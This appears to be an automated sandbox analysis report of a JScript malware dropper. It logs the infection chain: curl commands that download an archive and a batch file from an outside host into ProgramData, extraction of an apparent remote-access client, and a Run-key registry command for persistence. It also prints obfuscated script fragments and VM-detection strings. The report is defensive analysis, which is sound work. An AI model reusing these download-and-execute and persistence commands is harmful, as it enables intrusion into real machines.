Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\qweq.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /h /y 7zz.exe C:\ProgramData\
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe TIMEOUT /T 7
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\7zz.exe C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\client32.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\client32.exe C:\ProgramData\client32.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
Source: unknown	Process created: C:\ProgramData\client32.exe "C:\ProgramData\client32.exe"
Source: unknown	Process created: C:\ProgramData\client32.exe "C:\ProgramData\client32.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C://ProgramData//fyAAWPXvDMiNSTKqVPpzzNr.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\sett.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\7z.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\qweq.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\qweq.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "C:\ProgramData\lolo.7z"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat" -o "C:\ProgramData\qweq.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /h /y 7zz.exe C:\ProgramData\
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe TIMEOUT /T 7
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\client32.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\7zz.exe C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\client32.exe C:\ProgramData\client32.exe	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\11[1].bat

Jump to behavior

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\b1.vbs

Jump to behavior

Source: classification engine

Classification label: mal92.troj.evad.winJS@40/37@6/4

Source: C:\ProgramData\client32.exe

Code function: 18_2_1115C8E0 CoInitializeSecurity,CoCreateInstance,wsprintfW,wsprintfW,SysAllocString,wsprintfW,SysFreeString,

18_2_1115C8E0

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\ProgramData\client32.exe

Code function: 18_2_1105A760 GetLastError,FormatMessageA,LocalFree,

18_2_1105A760

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_01

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C://ProgramData//fyAAWPXvDMiNSTKqVPpzzNr.bat

Source: C:\ProgramData\7zz.exe

File written: C:\ProgramData\NSM.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\curl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\curl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\curl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\curl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\curl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\curl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\client32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\ProgramData\client32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\ProgramData\client32.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Jump to behavior

Source: C:\ProgramData\7zz.exe

File opened: C:\ProgramData\msvcr100.dll

Jump to behavior

Source:	Binary string: msvcr100.i386.pdb source: 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1076397431.000000006FA41000.00000020.00000001.01000000.0000000C.sdmp, client32.exe, 00000014.00000002.592216139.000000006FA41000.00000020.00000001.01000000.0000000C.sdmp, client32.exe, 00000015.00000002.608695094.000000006FA41000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.15.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.591643894.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.608252668.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1076342893.000000006F9D0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000000.586153494.0000000000212000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000012.00000002.1074264589.0000000000212000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000014.00000002.590783573.0000000000212000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000014.00000000.588400039.0000000000212000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000015.00000002.607562587.0000000000212000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000015.00000000.606379761.0000000000212000.00000002.00000001.01000000.00000008.sdmp, client32.exe.15.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: 7zz.exe, 0000000F.00000003.570917402.00000000027EE000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.15.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1076598364.00000000738D2000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000014.00000002.592538665.00000000738D2000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000015.00000002.609000932.00000000738D2000.00000002.00000001.01000000.0000000A.sdmp, PCICHEK.DLL.15.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: 7zz.exe, 0000000F.00000003.570917402.000000000231E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1076342893.000000006F9D0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.15.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: 7zz.exe, 0000000F.00000003.570917402.00000000027EE000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.15.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1076517703.0000000073895000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000014.00000002.592496107.0000000073895000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000015.00000002.608910949.0000000073895000.00000002.00000001.01000000.0000000B.sdmp, pcicapi.dll.15.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: 7zz.exe, 0000000F.00000003.570917402.0000000002449000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.591643894.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.608252668.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.dr

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.CreateObject(asxc)}function anonymous() {/*ZgwZJNVxbZRuHdcfXEsyDVtLbjhVqzqBNAFQwqBQLiicfvqEAxxMPiuuKnZFyUhwmJnljkJIKyuWXWXuwDTxkgFgwKFtypslqCHOWVwRpvFsgzxHbiwVNPBAZCGDHwkFPkAkosToeVPPbeFToRhBADYcegYUWjFKMUWUDFeorvLQeYewnDpWXFKvvbQTjQAkTxVkOFqcCzdivfQNNruceVYWiqdMhfGxvIeRMOMrkXHePLtfPNUuYhXqoSHtCpCJMYQAtOYHelUyEBcOVEgfoJuXLNdQyDCHuYoVnWaPPRoOgdbnJiVzTygSmTSOdkqsFOYOxneMfKqwMMoRicOLguMhljRrBlHifAwjWloFjQraVOPfFZKhJIVRwfpFRIaIohfippzXCGEUhfqLOEiSppABaTFTHWPacRNJjoOfcSDSLMaJWqceQJGnNsGwOfqKIKePxeUoNWzTXTBtbIMNajbgvsWLvmiYNNTFSRuEYTJwTPoxKTLkfNPXypxtCzRBuPgOAWunKQylJWILPMmyxlhfOdvZTdFsJxkWDnpURGwayATIFKFjCINLMfqoRpvDjkcHkuuAuSXmEYMKesrfDWIMEzFxEypWtxxkpAcbjungVAncXmrguNKLZMRTvGQEebwgBAfKWlZRQuDlwnIoKFlUPEArEdLzlmLRGPlNGkLhTPOhNGyKplVIWdBjhmOeerBwgrlbcLRkXfcichFalCtAuFIlfIGJolIXXLYCwnwforrAZeumnhSJQPhRZdIRWSFhKKLEcnONuJpZeDYseTxmKHiwwbYkuxguMVfLVAtcwzzDHcRcdHEPTcGTpzOarWSeDeDgMwFBAztvtBfzdVDogJxWhieVskCfNVZNNdsnHgqvjEIFTUPxwNkaVUSZUSTiOHWADXhanrMLfiEgvpOMUnuFKEqGAfWavhzlpvPDjIaHiWnMohuiDlnhOKRHYuINHfhZronDflfWydAyVyowqGoGNfenEWmbxlgbAcEOwJMpHmNPIHqayefnpGtMvYWWlwtxkCJYIxPeDFrPiepJVRaWxwhoibsboVusGuNqvgfxOinSeTYsihcbvHuuWkAMytnppKGEvsuDlEAhDEcSAwtkGVrSLbhfNDnAfBkPXCNzuTlDHfeWnxBAJLeIhMmYQJMLzDqCtRMDWfMqCHDiLeXscRMDOtDtAYPvGrpDWZWtBmIQrDdNKyiTdpNCsUtnjkiJinDWGzrSmEUAXPiZShqoZkIffKDPVYibsWLIXFyFrndNtzjeMcBWyEEoInFzDOORugbmjbOedwIswuCbzPRdzhxIJSgaGzCFicXSuyUDUAWaCmMsUgYsyGyCHPVRTxtjjVBQifPzCoMKVEYpHaNOSFmkXJMIdpLeWlNARReheKcvTiPjUBEujOEVxGSVkbCUixPdaPwTEPLqDSiSydfgxzQHwmetolFdcjcbuknLfTvqoxHkZoPaqKnwwhgYtUZNiqTUrSUqXYTNZpaxXNbVdHUZRkhTJoTJjTcSGvlWpIQIhnzQzknktdjXYeSdDZdRIsxwmPFZAEWLSytmEdOXsJvyMGvlQfvXpLHUsFgUWdemZMtkLWbHIKSKuqhYfKfrTwBLzkqYPCbDfVMrsLIUgauDKbPwomefWtatnUrGWhNDKgRNOvOJMlcOWUwPNxpCeregEOAHnFzGGzczXbniyxIHxDXBhHcWIHAntAnfXhTUyXMicSllYVbGUztTSJJluqezQbkxEkvkbNXIZAQnDxSWZdImHLQiWJgrNsKgRauAtAqwqBMRTzGXedOJCdtdeaxTNPXJiYhMytFysoCblVYeYMenvONGLfxAQTpsSKpYYmWhUXpNXoCTdVTauCvmbgoQqkEemsCrBeMhfEvgYNExfkgTothLwLuNahLdtjVgKqInYZlLgenHBtaJhOXRsPDRSgziMtjTBDfgfvUcnLQTTYzoufFvwpIzEMgESmWfUSIPEpohTdqmOjbBkdRrNhymcYtynwBiZWcBUvHLlwvHRDHuFnmekreNBjadpKIfmDyRBxhArktPqldvPJGbKTWyGRIhERudsibwoRNeXhRebzvDVVBruyjIdflHxIMMYCvLyiSaDYwJSkxCYrYOayXKtAiHcTqIvSncdPAlKDSagtbTnGnEuxalhQGlkxzAynoayUvBQmgrKTigkyMfNTSapJBdVMlkJQKoQcObKLIfNvCYiTZbtUmKwpliSzwKGYtdHEPcaUOkmCHfKVPOdcEgjPuGOcdiIUphMbwxHDLCikqwDqmYqSUwbVeGjlIFVJMKaOqbTBtbATwcxkQWOpqUFnpaCjDAEYdfpQwvQOnFhMBrOpKBFSkvWXYaHgXPNyPMFJvBRiTEupPhIdCllGXrHHmiAtrtjXGGcuyzDvxCjjNTDKSDAfcIbMZgzvZDaeoxsgeACVHyPxvTytFRXrmtpFmgVWaQdmkGvoebdEkbqFnNAPyPeWdjFGKazZoOHuzavWegojtiQuHYNKGAEgfLThxdgUqacBoTKOcAzMTAyOQACRLZJXXTKcjpyBwjmYlYPxXVbaYTLloGXPTQpryHkRCTLGwNuhNwEtmgLCdxbpsoNSXoLCYVPtZgmWXXPgfydkpVpzdORdcGQHmHVrNAIvKsuMPrVEhfmsrXxWIaHLZjBiIsNIEyJnGjaetPQlFFtXYLwInifNRBRdstDqeUWAGfPcEWgUbJSqrGeOGTbJpfDIqYfGGYBYcrumRxSgXpaADOHenuSNjkHixtNkjwXOHTtdrhRUjhgSGGfPcqLhUlcghMwlIWyLRIWpIZpGUNQsviPxmTDnRslQoYjtFMJWQPwElbkPZHktLUGbnhqmOWjgECZuBFVsxCrRNdtpcqxHPuTPrLWxjWyzjBsZDPrexapUIvrIXnyPkUZoldBqNWxuZJHIXizeJjAZRGXilyUWLbyrkrNXFSD

Source: C:\ProgramData\7zz.exe	Code function: 15_2_0046CC80 push eax; ret	15_2_0046CCAE
Source: C:\ProgramData\7zz.exe	Code function: 15_2_00459590 push ecx; mov dword ptr [esp], ecx	15_2_00459591
Source: C:\ProgramData\7zz.exe	Code function: 15_2_0046B890 push eax; ret	15_2_0046B8AE
Source: C:\ProgramData\client32.exe	Code function: 18_2_1116FF15 push ecx; ret	18_2_1116FF28
Source: C:\ProgramData\client32.exe	Code function: 18_2_1116AE09 push ecx; ret	18_2_1116AE1C

Source: 7zz.exe.6.dr	Static PE information: section name: .sxdata
Source: putty.exe.15.dr	Static PE information: section name: .00cfg
Source: putty.exe.15.dr	Static PE information: section name: .gxfg
Source: putty.exe.15.dr	Static PE information: section name: _RDATA
Source: PCICL32.DLL.15.dr	Static PE information: section name: .hhshare

Source: C:\ProgramData\7zz.exe

Code function: 15_2_00471C24 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

15_2_00471C24

Source: initial sample

Static PE information: section name: .text entropy: 6.909044922675825

Persistence and Installation Behavior

Command shell drops VBS files

Source: C:\Windows\System32\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\b1.vbs	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\b2.vbs	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\b3.vbs	Jump to behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe

Source: C:\ProgramData\7zz.exe	File created: C:\ProgramData\remcmdstub.exe	Jump to dropped file
Source: C:\ProgramData\7zz.exe	File created: C:\ProgramData\PCICHEK.DLL	Jump to dropped file
Source: C:\ProgramData\7zz.exe	File created: C:\ProgramData\PCICL32.DLL	Jump to dropped file
Source: C:\ProgramData\7zz.exe	File created: C:\ProgramData\TCCTL32.DLL	Jump to dropped file
Source: C:\ProgramData\7zz.exe	File created: C:\ProgramData\HTCTL32.DLL	Jump to dropped file
Source: C:\ProgramData\7zz.exe	File created: C:\ProgramData\client32.exe	Jump to dropped file
Source: C:\ProgramData\7zz.exe	File created: C:\ProgramData\putty.exe	Jump to dropped file
Source: C:\ProgramData\7zz.exe	File created: C:\ProgramData\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\ProgramData\7zz.exe	Jump to dropped file
Source: C:\ProgramData\7zz.exe	File created: C:\ProgramData\pcicapi.dll	Jump to dropped file

Source: C:\ProgramData\7zz.exe	File created: C:\ProgramData\remcmdstub.exe	Jump to dropped file
Source: C:\ProgramData\7zz.exe	File created: C:\ProgramData\PCICHEK.DLL	Jump to dropped file
Source: C:\ProgramData\7zz.exe	File created: C:\ProgramData\PCICL32.DLL	Jump to dropped file
Source: C:\ProgramData\7zz.exe	File created: C:\ProgramData\TCCTL32.DLL	Jump to dropped file
Source: C:\ProgramData\7zz.exe	File created: C:\ProgramData\HTCTL32.DLL	Jump to dropped file
Source: C:\ProgramData\7zz.exe	File created: C:\ProgramData\client32.exe	Jump to dropped file
Source: C:\ProgramData\7zz.exe	File created: C:\ProgramData\putty.exe	Jump to dropped file
Source: C:\ProgramData\7zz.exe	File created: C:\ProgramData\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\ProgramData\7zz.exe	Jump to dropped file
Source: C:\ProgramData\7zz.exe	File created: C:\ProgramData\pcicapi.dll	Jump to dropped file

Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CachedX			Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CachedX			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 5050
Source: unknown	Network traffic detected: HTTP traffic on port 5050 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 5050
Source: unknown	Network traffic detected: HTTP traffic on port 5050 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 5050
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 5050
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 5050
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 5050

Source: C:\ProgramData\client32.exe	Code function: 18_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	18_2_110C1020
Source: C:\ProgramData\client32.exe	Code function: 18_2_11113380 IsIconic,GetTickCount,	18_2_11113380
Source: C:\ProgramData\client32.exe	Code function: 18_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	18_2_110CB750
Source: C:\ProgramData\client32.exe	Code function: 18_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	18_2_110CB750

Source: C:\ProgramData\client32.exe

Code function: 18_2_11144140 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

18_2_11144140

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\wscript.exe TID: 1968	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 3852	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\timeout.exe TID: 7088	Thread sleep count: 47 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\ProgramData\client32.exe	Last function: Thread delayed

Source: C:\ProgramData\7zz.exe	Dropped PE file which has not been started: C:\ProgramData\remcmdstub.exe	Jump to dropped file
Source: C:\ProgramData\7zz.exe	Dropped PE file which has not been started: C:\ProgramData\TCCTL32.DLL	Jump to dropped file
Source: C:\ProgramData\7zz.exe	Dropped PE file which has not been started: C:\ProgramData\putty.exe	Jump to dropped file

Source: C:\ProgramData\client32.exe	Evaded block: after key decision			graph_18-28701
Source: C:\ProgramData\client32.exe	Evaded block: after key decision			graph_18-28549

Source: C:\ProgramData\client32.exe

API coverage: 5.7 %

Source: C:\ProgramData\client32.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\ProgramData\7zz.exe

Code function: 15_2_0040C5F4 GetSystemInfo,

15_2_0040C5F4

Source: C:\ProgramData\7zz.exe	Code function: 15_2_0040B174 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,AreFileApisANSI,FindFirstFileA,		15_2_0040B174
Source: C:\ProgramData\7zz.exe	Code function: 15_2_0040B6E9 __EH_prolog,FindFirstFileW,GetCurrentDirectoryW,		15_2_0040B6E9

Source: C:\ProgramData\client32.exe	API call chain: ExitProcess graph end node	graph_18-27188
Source: C:\ProgramData\client32.exe	API call chain: ExitProcess graph end node	graph_18-27012
Source: C:\ProgramData\client32.exe	API call chain: ExitProcess graph end node	graph_18-27369

Source: client32.exe, 00000012.00000003.598224703.0000000005A1A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075040257.00000000059A8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.600773617.0000000005A15000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.600308055.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.600433827.00000000059E0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.600589324.0000000005A07000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.601282825.00000000059E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWU
Source: HTCTL32.DLL.15.dr	Binary or memory string: VMware
Source: wscript.exe, 00000000.00000002.588360926.0000021D8FB21000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}DDU
Source: client32.exe, 00000012.00000002.1074407256.000000000128A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: HTCTL32.DLL.15.dr	Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: TCCTL32.DLL.15.dr	Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: wscript.exe, 00000000.00000003.587035176.0000021D8DA6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.587180032.0000021D8D9FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.553994685.0000021D8DA6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.587961476.0000021D8D9FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.587961476.0000021D8DA6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.554054566.0000021D8DA0F000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.599174819.0000000005F0B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.600501044.0000000005F06000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.600621894.0000000005F0B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000003.601074682.0000000005F13000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.1075398359.0000000005F00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
